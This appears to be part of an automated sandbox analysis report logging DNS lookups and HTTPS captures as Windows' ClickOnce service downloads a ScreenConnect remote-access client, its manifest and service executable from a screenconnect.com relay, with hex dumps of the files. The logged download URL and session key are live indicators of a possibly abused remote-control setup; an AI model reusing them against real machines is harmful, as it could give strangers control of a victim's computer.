                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.559389114 CET1.1.1.1192.168.2.50x3ae9No error (0)server-nixd2d85b70-relay.screenconnect.com147.75.81.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.213187933 CET1.1.1.1192.168.2.50x786fNo error (0)instance-l7g4dh-relay.screenconnect.comserver-nixd2d85b70-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.213187933 CET1.1.1.1192.168.2.50x786fNo error (0)server-nixd2d85b70-relay.screenconnect.com147.75.81.4A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • koidesfac.screenconnect.com

                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.549705147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC655OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140 HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 118570
                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:28 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16146INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16384INData Raw: 31 30 6b 72 7a 42 57 42 47 2b 50 4a 4c 63 76 36 4f 6c 4f 4d 42 6c 59 48 33 41 77 47 37 46 77 49 34 61 55 38 4a 49 57 35 33 44 55 30 41 2f 78 48 37 34 79 63 51 57 4c 4e 6e 45 6a 42 68 71 78 61 73 79 6a 38 55 71 64 76 66 46 37 68 49 59 78 69 35 43 47 73 59 55 42 45 48 47 2f 34 70 68 78 34 43 61 2f 73 66 4f 39 6b 54 4a 38 32 50 77 79 61 4e 33 43 38 70 4c 4c 4e 4c 4b 64 4e 6e 31 79 6c 50 61 67 73 75 38 42 75 33 4c 4b 6e 62 67 7a 4e 66 61 4e 38 30 32 66 4b 44 4e 4a 73 45 58 7a 76 6a 57 63 73 37 43 79 72 50 4f 49 77 2f 74 7a 75 5a 48 2f 38 37 49 73 4e 4c 50 34 46 6b 51 30 4d 35 70 75 39 41 6e 38 72 7a 51 47 75 4c 76 30 63 6a 69 2b 39 47 4e 44 68 6a 53 4a 2b 79 62 30 68 76 43 36 39 49 45 57 6f 54 54 68 38 54 6b 30 79 4d 79 5a 64 53 74 69 34 54 56 36 4f 58 77 31
                                                                                                                                                                                                                                        Data Ascii: 10krzBWBG+PJLcv6OlOMBlYH3AwG7FwI4aU8JIW53DU0A/xH74ycQWLNnEjBhqxasyj8UqdvfF7hIYxi5CGsYUBEHG/4phx4Ca/sfO9kTJ82PwyaN3C8pLLNLKdNn1ylPagsu8Bu3LKnbgzNfaN802fKDNJsEXzvjWcs7CyrPOIw/tzuZH/87IsNLP4FkQ0M5pu9An8rzQGuLv0cji+9GNDhjSJ+yb0hvC69IEWoTTh8Tk0yMyZdSti4TV6OXw1
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16384INData Raw: 51 41 53 77 42 6c 41 48 6b 41 63 77 42 30 41 48 49 41 62 77 42 72 41 47 55 41 63 77 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 59 77 77 41 41 44 35 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 4d 41 61 41 42 68 41 48 49 41 61 51 42 75 41 47 63 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 48 34 4d 41 41 42 55 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 52 51 42 75 41 47 45 41 59 67 42 73 41 47 55 41 51 77 42 73 41 47 6b 41 63 41 42 69 41 47 38 41 59 51 42 79 41 47 51 41 53 41 42 6c 41 47 77 41 63 41 42 45 41 47 55 41 63 77 42 6a 41 48 49 41 61 51 42 77 41 48 51 41 61 51 42 76 41 47 34 41 6a 77 77 41 41
                                                                                                                                                                                                                                        Data Ascii: QASwBlAHkAcwB0AHIAbwBrAGUAcwBUAGkAdABsAGUAYwwAAD5DAG8AbgB0AHIAbwBsAFAAYQBuAGUAbABDAG8AbgB0AHIAbwBsAFMAaABhAHIAaQBuAGcAVABpAHQAbABlAH4MAABUQwBvAG4AdAByAG8AbABQAGEAbgBlAGwARQBuAGEAYgBsAGUAQwBsAGkAcABiAG8AYQByAGQASABlAGwAcABEAGUAcwBjAHIAaQBwAHQAaQBvAG4AjwwAA
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16384INData Raw: 42 6a 41 48 49 41 5a 51 42 6c 41 47 34 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 61 51 42 75 41 47 63 41 55 41 42 6c 41 48 49 41 62 51 42 70 41 48 4d 41 63 77 42 70 41 47 38 41 62 67 42 48 41 48 49 41 59 51 42 75 41 48 51 41 53 51 42 75 41 48 4d 41 64 41 42 79 41 48 55 41 59 77 42 30 41 47 6b 41 62 77 42 75 41 48 4d 41 54 41 42 70 41 48 4d 41 64 41 42 47 41 47 38 41 63 67 42 74 41 47 45 41 64 41 42 44 41 47 45 41 62 67 42 55 41 48 49 41 61 51 42 6e 41 47 63 41 5a 51 42 79 41 46 41 41 63 67 42 76 41 47 30 41 63 41 42 30 41 44 63 71 41 41 44 55 41 55 30 41 59 51 42 6a 41 45 4d 41 59 51 42 30 41 47 45 41 62 41 42 70 41 47 34 41 59 51 42 53 41 47 55 41 64 67 42 70 41 47 55 41 64 77 42 54 41 48 6b 41 63 77 42 30 41 47 55 41 62 51 42 42 41 47 4d 41 59
                                                                                                                                                                                                                                        Data Ascii: BjAHIAZQBlAG4AQwBhAHAAdAB1AHIAaQBuAGcAUABlAHIAbQBpAHMAcwBpAG8AbgBHAHIAYQBuAHQASQBuAHMAdAByAHUAYwB0AGkAbwBuAHMATABpAHMAdABGAG8AcgBtAGEAdABDAGEAbgBUAHIAaQBnAGcAZQByAFAAcgBvAG0AcAB0ADcqAADUAU0AYQBjAEMAYQB0AGEAbABpAG4AYQBSAGUAdgBpAGUAdwBTAHkAcwB0AGUAbQBBAGMAY
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16384INData Raw: 55 75 41 51 31 53 5a 57 4e 6c 61 58 5a 6c 49 46 4e 76 64 57 35 6b 41 54 52 44 59 58 42 30 64 58 4a 6c 49 47 31 76 64 47 6c 76 62 69 42 32 61 57 52 6c 62 79 42 30 62 79 42 68 62 69 42 42 56 6b 6b 67 5a 6d 6c 73 5a 53 42 76 62 69 42 35 62 33 56 79 49 47 31 68 59 32 68 70 62 6d 55 75 41 51 78 53 5a 57 4e 76 63 6d 51 67 56 6d 6c 6b 5a 57 38 42 44 6c 4e 6a 63 6d 56 6c 62 69 42 44 59 58 42 30 64 58 4a 6c 41 53 74 44 61 47 39 76 63 32 55 67 64 47 68 6c 49 47 46 75 62 6d 39 30 59 58 52 70 62 32 34 67 62 57 39 6b 5a 53 42 6d 62 33 49 67 64 47 68 6c 49 48 4e 6c 63 33 4e 70 62 32 34 75 41 51 74 54 5a 57 78 6c 59 33 51 67 54 57 39 6b 5a 51 46 4b 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 68 62 6d 35 76 64 47 46 30 61 57 39 75 49 48 4e 30 63 6d 39 72 5a 53 42 30 61
                                                                                                                                                                                                                                        Data Ascii: UuAQ1SZWNlaXZlIFNvdW5kATRDYXB0dXJlIG1vdGlvbiB2aWRlbyB0byBhbiBBVkkgZmlsZSBvbiB5b3VyIG1hY2hpbmUuAQxSZWNvcmQgVmlkZW8BDlNjcmVlbiBDYXB0dXJlAStDaG9vc2UgdGhlIGFubm90YXRpb24gbW9kZSBmb3IgdGhlIHNlc3Npb24uAQtTZWxlY3QgTW9kZQFKQ2hvb3NlIHRoZSBhbm5vdGF0aW9uIHN0cm9rZSB0a
                                                                                                                                                                                                                                        2024-12-20 17:22:29 UTC16384INData Raw: 42 79 64 57 34 67 61 58 51 67 61 57 35 7a 64 47 46 75 64 47 78 35 4c 67 45 47 52 47 56 73 5a 58 52 6c 41 51 31 4f 5a 58 63 67 52 47 6c 79 5a 57 4e 30 62 33 4a 35 41 51 5a 53 5a 57 35 68 62 57 55 42 45 46 56 77 62 47 39 68 5a 43 42 45 61 58 4a 6c 59 33 52 76 63 6e 6b 42 44 6c 56 77 62 47 39 68 5a 43 42 47 61 57 78 6c 4b 48 4d 70 41 51 70 4d 62 32 46 6b 61 57 35 6e 4c 69 34 75 41 51 41 42 41 41 45 41 41 51 41 42 41 41 45 41 41 51 41 42 41 41 45 6f 57 57 39 31 63 69 42 6a 62 32 31 77 64 58 52 6c 63 69 42 70 63 79 42 69 5a 57 6c 75 5a 79 42 6a 62 32 35 30 63 6d 39 73 62 47 56 6b 49 47 4a 35 49 48 73 77 66 51 45 47 51 32 46 75 59 32 56 73 41 55 42 42 49 47 35 6c 64 79 42 32 5a 58 4a 7a 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 37 4d 48 30 67 59 32 78 70 5a
                                                                                                                                                                                                                                        Data Ascii: BydW4gaXQgaW5zdGFudGx5LgEGRGVsZXRlAQ1OZXcgRGlyZWN0b3J5AQZSZW5hbWUBEFVwbG9hZCBEaXJlY3RvcnkBDlVwbG9hZCBGaWxlKHMpAQpMb2FkaW5nLi4uAQABAAEAAQABAAEAAQABAAEoWW91ciBjb21wdXRlciBpcyBiZWluZyBjb250cm9sbGVkIGJ5IHswfQEGQ2FuY2VsAUBBIG5ldyB2ZXJzaW9uIG9mIHRoZSB7MH0gY2xpZ
                                                                                                                                                                                                                                        2024-12-20 17:22:30 UTC16384INData Raw: 41 52 63 77 69 78 58 30 4e 2f 42 31 35 42 51 41 57 6b 31 36 47 55 30 4a 31 34 38 41 62 53 64 45 53 65 42 4d 42 42 2b 50 4a 48 53 33 54 77 4f 7a 68 41 49 44 46 44 45 49 71 34 63 4e 46 56 54 39 72 79 61 56 65 4a 6b 70 67 2b 51 4c 4f 76 49 74 30 35 30 6e 45 41 6e 35 41 5a 67 47 41 42 56 78 4d 77 7a 72 68 73 71 70 47 72 4f 4f 45 45 6a 68 43 41 54 65 2f 31 37 45 55 6d 69 6b 6b 41 46 68 59 2f 72 5a 44 53 32 46 61 30 53 39 62 74 71 2f 4d 51 67 6b 63 67 34 41 7a 31 38 41 76 6d 45 49 43 41 4d 72 66 36 42 71 78 2b 73 76 47 73 61 65 2f 42 49 35 42 77 45 71 75 67 52 2b 52 58 51 42 67 44 71 31 75 57 34 51 57 71 74 6b 4b 50 56 6f 32 6a 4a 30 31 39 53 56 77 46 41 4c 4f 58 41 4e 48 2b 7a 62 77 4b 2f 49 4c 41 46 78 50 79 4f 62 6e 47 68 71 78 30 71 52 45 43 58 79 49 67 49
                                                                                                                                                                                                                                        Data Ascii: ARcwixX0N/B15BQAWk16GU0J148AbSdESeBMBB+PJHS3TwOzhAIDFDEIq4cNFVT9ryaVeJkpg+QLOvIt050nEAn5AZgGABVxMwzrhsqpGrOOEEjhCATe/17EUmikkAFhY/rZDS2Fa0S9btq/MQgkcg4Az18AvmEICAMrf6Bqx+svGsae/BI5BwEqugR+RXQBgDq1uW4QWqtkKPVo2jJ019SVwFALOXANH+zbwK/ILAFxPyObnGhqx0qRECXyIgI
                                                                                                                                                                                                                                        2024-12-20 17:22:30 UTC4120INData Raw: 77 56 71 54 38 63 7a 68 73 49 77 51 51 77 46 71 52 4b 70 6a 44 73 65 79 51 41 67 68 67 72 55 6a 35 35 33 44 59 78 51 41 67 67 4c 55 69 46 5a 2f 44 73 52 67 56 77 4d 63 4f 4b 59 41 41 31 6f 71 55 66 77 36 48 58 51 77 41 41 6c 67 72 55 73 70 43 2b 42 77 4f 6f 36 41 42 42 4c 41 72 63 46 4b 2f 44 58 6a 4f 4a 45 6f 41 42 48 43 6d 56 71 51 48 38 58 4d 34 48 6a 75 6a 41 41 4a 59 4b 31 4c 68 4e 75 43 56 71 41 41 32 69 52 4a 41 41 44 65 30 46 61 6e 45 46 66 69 33 2b 44 6b 63 4a 6c 45 43 43 47 43 74 53 4d 58 62 67 4e 39 47 42 66 43 61 4d 77 6f 67 67 42 75 71 2b 44 53 4f 70 56 34 41 50 7a 51 49 43 77 41 42 6e 4b 73 56 61 51 78 74 77 41 5a 68 41 51 68 67 72 55 67 70 4b 2f 46 74 77 4f 5a 77 41 41 68 67 56 2b 44 69 62 63 41 50 6f 67 4c 34 70 54 4d 4b 49 49 41 62 71 2b
                                                                                                                                                                                                                                        Data Ascii: wVqT8czhsIwQQwFqRKpjDseyQAghgrUj553DYxQAggLUiFZ/DsRgVwMcOKYAA1oqUfw6HXQwAAlgrUspC+BwOo6ABBLArcFK/DXjOJEoABHCmVqQH8XM4HjujAAJYK1LhNuCVqAA2iRJAADe0FanEFfi3+DkcJlECCGCtSMXbgN9GBfCaMwoggBuq+DSOpV4APzQICwABnKsVaQxtwAZhAQhgrUgpK/FtwOZwAAhgV+DibcAPogL4pTMKIIAbq+


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.549710147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:32 UTC109OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:33 UTC341INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 17858
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.Client.manifest"; filename*=UTF-8''ScreenConnect.Client.manifest
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:33 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:33 UTC16043INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                        2024-12-20 17:22:33 UTC1815INData Raw: 46 34 52 53 36 68 6e 79 7a 68 47 4d 49 61 7a 4d 58 75 6b 30 6c 77 51 6a 4b 50 2b 38 62 71 48 50 4e 6c 61 4a 47 69 54 55 79 43 45 55 68 53 61 4e 34 51 76 52 52 58 58 65 67 59 45 32 58 46 66 37 4a 50 68 53 78 49 70 46 61 45 4e 64 62 35 4c 70 79 71 41 42 58 52 4e 2f 34 61 42 70 54 43 66 4d 6a 71 47 7a 4c 6d 79 73 4c 30 70 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a
                                                                                                                                                                                                                                        Data Ascii: F4RS6hnyzhGMIazMXuk0lwQjKP+8bqHPNlaJGiTUyCEUhSaN4QvRRXXegYE2XFf7JPhSxIpFaENdb5LpyqABXRN/4aBpTCfMjqGzLmysL0p6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJ


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.549722147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:42 UTC135OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 95512
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.ClientService.exe"; filename*=UTF-8''ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:42 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC16039INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC16384INData Raw: e8 fb fe ff ff 8b f0 83 c4 10 85 f6 74 10 ff 75 08 8b ce ff 15 88 d1 40 00 ff d6 5e 5d c3 5e 5d ff 25 e0 d0 40 00 55 8b ec 56 68 6c dd 40 00 68 64 dd 40 00 68 6c dd 40 00 6a 01 e8 c0 fe ff ff 83 c4 10 8b f0 ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 ec d0 40 00 5e 5d c3 55 8b ec 56 68 7c dd 40 00 68 74 dd 40 00 68 7c dd 40 00 6a 02 e8 85 fe ff ff 83 c4 10 8b f0 ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75
                                                                                                                                                                                                                                        Data Ascii: tu@^]^]%@UVhl@hd@hl@jut@@^]UVh|@ht@h|@jut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtu
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC16384INData Raw: c0 74 10 ff 75 18 50 56 ff 75 0c ff 15 6c d0 40 00 8b f8 56 e8 27 00 00 00 59 80 7d f4 00 74 0a 8b 45 e8 83 a0 50 03 00 00 fd 8b c7 8d 65 dc 5f 5e 5b 8b 4d fc 33 cd e8 d0 91 ff ff 8b e5 5d c3 8b ff 55 8b ec 8b 45 08 85 c0 74 12 83 e8 08 81 38 dd dd 00 00 75 07 50 e8 ee d9 ff ff 59 5d c3 8b ff 55 8b ec 8b 45 08 f0 ff 40 0c 8b 48 7c 85 c9 74 03 f0 ff 01 8b 88 84 00 00 00 85 c9 74 03 f0 ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0
                                                                                                                                                                                                                                        Data Ascii: tuPVul@V'Y}tEPe_^[M3]UEt8uPY]UE@H|ttttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC16384INData Raw: 0f 00 75 06 83 7d 08 00 74 0f f7 d9 1b c9 83 e1 90 8d 81 80 00 00 00 5d c3 dd 45 08 d9 ee da e9 df e0 f6 c4 44 7a 0c f7 d9 1b c9 83 e1 e0 8d 41 40 5d c3 f7 d9 1b c9 81 e1 08 ff ff ff 8d 81 00 01 00 00 5d c3 ff 25 bc d0 40 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 33 d2 53 56 57 8b 48 3c 03 c8 0f b7 41 14 0f b7 59 06 83 c0 18 03 c1 85 db 74 1b 8b 7d 0c 8b 70 0c 3b fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00
                                                                                                                                                                                                                                        Data Ascii: u}t]EDzA@]]%@UE3SVWH<AYt}p;rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph
                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC16384INData Raw: 00 2d 00 61 00 7a 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 62 00 65 00 2d 00 62 00 79 00 00 00 62 00 67 00 2d 00 62 00 67 00 00 00 62 00 6e 00 2d 00 69 00 6e 00 00 00 62 00 73 00 2d 00 62 00 61 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 63 00 61 00 2d 00 65 00 73 00 00 00 63 00 73 00 2d 00 63 00 7a 00 00 00 63 00 79 00 2d 00 67 00 62 00 00 00 64 00 61 00 2d 00 64 00 6b 00 00 00 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00
                                                                                                                                                                                                                                        Data Ascii: -az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-cae
